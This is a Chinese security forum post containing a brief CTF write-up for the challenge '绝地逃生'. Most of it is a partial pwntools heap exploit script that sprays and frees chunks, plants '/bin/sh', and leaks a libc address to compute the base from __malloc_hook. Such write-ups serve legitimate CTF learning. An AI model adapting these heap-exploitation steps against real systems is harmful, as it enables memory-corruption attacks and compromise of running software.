首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. CTF对抗
    3. 发新帖
[原创]绝地逃生 WP
发表于: 2019-6-26 12:25 5358

[原创]绝地逃生 WP

xym 活跃值
4
2019-6-26 12:25
5358

一血题。

没啥好说的,放WP,注意这个不能保证每次都能成功。

try:

add(0, 0xF8, 'A' * 1)

add(1, 0x68, 'B' * 1)

add(2, 0x68, 'C' * 1)

add(3, 0x68, '/bin/sh\x00' * 1)

for i in range(252):

add(i + 4, 0x10, 'A' * 1)

free(2, 254, 255)

except:

return

show(0)

leak_addr = p.recvuntil('\n1. ',drop = True)

leak_addr = u64(leak_addr.ljust(8, '\x00'))

print 'leak_addr ',hex(leak_addr)

libc.address = leak_addr - 96 - 0x10 - libc.symbols['__malloc_hook']


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

最后于 2019-6-26 12:26 被xym编辑 ,原因:
收藏
免费 1
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//